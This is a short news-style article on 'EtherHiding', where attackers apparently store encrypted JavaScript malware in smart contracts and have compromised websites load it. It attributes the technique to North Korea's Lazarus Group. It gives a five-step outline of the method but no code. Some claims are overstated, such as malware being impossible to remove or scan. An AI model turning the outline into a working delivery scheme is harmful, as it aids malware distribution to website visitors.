North Korean Hackers Hide Malware Inside Smart Contracts: A New Threat to Blockchain Security

Blockchain technology has long been praised for its immutability, transparency, and security. However, new research shows that even decentralized systems can be targeted by sophisticated attacks. Cybersecurity experts report that North Korean state-sponsored hackers have developed a new method of embedding malware directly into smart contracts on public blockchains.

Who Is Behind the Attack?

According to cybersecurity analysts, the attacks are linked to the Lazarus Group, a notorious North Korean hacker organization responsible for:

• The Axie Infinity Ronin Bridge hack ($625 million)
• The Harmony Horizon breach ($100 million)
• Phishing campaigns targeting crypto professionals
• Malware attacks on Asian cryptocurrency exchanges

Lazarus is known for its innovative techniques to steal cryptocurrency assets to support North Korea’s sanctioned economy. Their tactics now include malware embedded in smart contracts.

What Is EtherHiding?

EtherHiding is a hacking technique in which attackers:

• Insert malicious JavaScript payloads
• Hide them inside blockchain smart contracts
• Trigger malware execution when websites load data from these contracts

The malware is split into encrypted segments to evade detection. Even if discovered, it cannot be removed because it resides on the blockchain, not a traditional server.

This method has been observed on:

• Ethereum
• BNB Chain / Binance Smart Chain
• Other EVM-compatible networks

How Malware Is Embedded in Smart Contracts

1. Create or hijack a smart contract: Deploy new contracts or exploit vulnerable existing ones.
2. Add encrypted malicious code: Small portions of JavaScript payload are stored in contract storage, logs, and on-chain metadata.
3. Infect websites: Hackers link scripts from compromised Web2 websites (e.g., WordPress) to malicious smart contracts.
4. Deploy malware via smart contract: When a user visits the compromised site, their browser decrypts and runs the malware silently.
5. Perpetual attack: The malware remains active and can be updated at any time by attackers.

Risks of EtherHiding Attacks

• Impossible to remove malware once embedded in smart contracts.
• Payloads can be updated indefinitely by attackers.
• Hard to detect due to encryption and distributed storage.
• Affects both Web2 and Web3 users.
• Conventional cybersecurity tools cannot scan blockchain-based malware.